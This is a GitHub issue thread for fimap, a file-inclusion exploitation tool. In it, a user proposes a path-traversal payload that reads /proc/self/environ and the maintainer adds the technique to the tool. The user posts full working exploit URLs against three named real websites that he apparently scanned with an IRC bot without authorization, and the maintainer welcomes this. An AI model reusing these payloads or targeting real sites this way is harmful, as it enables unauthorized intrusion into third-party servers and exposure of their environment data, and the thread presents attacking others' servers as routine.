search

kurobeats / fimap

fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
GNU General Public License v2.0
521 stars 99 forks source link

just suggestion #36

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago 
i have try LFI method i forgot where i read it :D, and i try it on joomla 
component and it works, may be in the future you can add this kind of exploit 
in fimap modul :D... 
http://www.centroorientamentodonbosco.it/index.php?option=com_agora&task=....//.
...//....//....//....//....//....//....//proc/self/environ%0000

Original issue reported on code.google.com by wishnusa...@gmail.com on 4 Jul 2010 at 5:26

GoogleCodeExporter commented 9 years ago 
Hi wishnusakti,

Cool stuff :)
I will try it out tonight and if it's actually decent I am going to implement 
it :)

Thanks man for this idea!
-imax.

Original comment by fimap....@gmail.com on 4 Jul 2010 at 6:25

GoogleCodeExporter commented 9 years ago 
It doesn't work for me somehow. I tried it out on different servers :(
If you have some more servers where it actually work please let me know :)

-imax.

Original comment by fimap....@gmail.com on 15 Sep 2010 at 6:56

GoogleCodeExporter commented 9 years ago 
yes i have another server to test, maybe with dork index.php?view=info_terms... 
later i will send the example :D.....

Original comment by wishnusa...@gmail.com on 16 Sep 2010 at 3:56

GoogleCodeExporter commented 9 years ago 
http://14kmedia.com//?view=....//....//....//....//....//....//....//....//..../
/....//....//proc/self/environ%0000

Original comment by wishnusa...@gmail.com on 16 Sep 2010 at 6:00

GoogleCodeExporter commented 9 years ago 
http://girlsfightboys.com//?view=....//....//....//....//....//....//....//..../
/....//....//....//proc/self/environ%0000, these are the servers i already 
tested... i scan these using bot scanner which run on mirc bro.. i hope this 
can be useful...

wishnusakti

Original comment by wishnusa...@gmail.com on 16 Sep 2010 at 6:21

GoogleCodeExporter commented 9 years ago 
Hey man!

This is actually useful!
Going to implement it for sure since it actually works.
Currently I have some exams. But after them this method will be included.

Thank you very much dude!
-imax.

Original comment by fimap....@gmail.com on 17 Sep 2010 at 7:53

GoogleCodeExporter commented 9 years ago 
you're welcome bro... i was edit my friend bot scanner and inspired by fimap 
broo... hehehe... and the com_agora bug i found it while using fimap... ur 
tools really great broo... 

wishnusakti

Original comment by wishnusa...@gmail.com on 17 Sep 2010 at 11:55

GoogleCodeExporter commented 9 years ago 
Hey wishnusakti,

I have implemented this in my current GIT version.
I will push this into SVN once I have tested it enought.

Thank you for suggesting it. Its really good :)
BTW it can be enabled with -M 2 (where 2 is the multiplier of terminal symbols 
like '.' or '/')

-imax.

Original comment by fimap....@gmail.com on 26 Sep 2010 at 5:20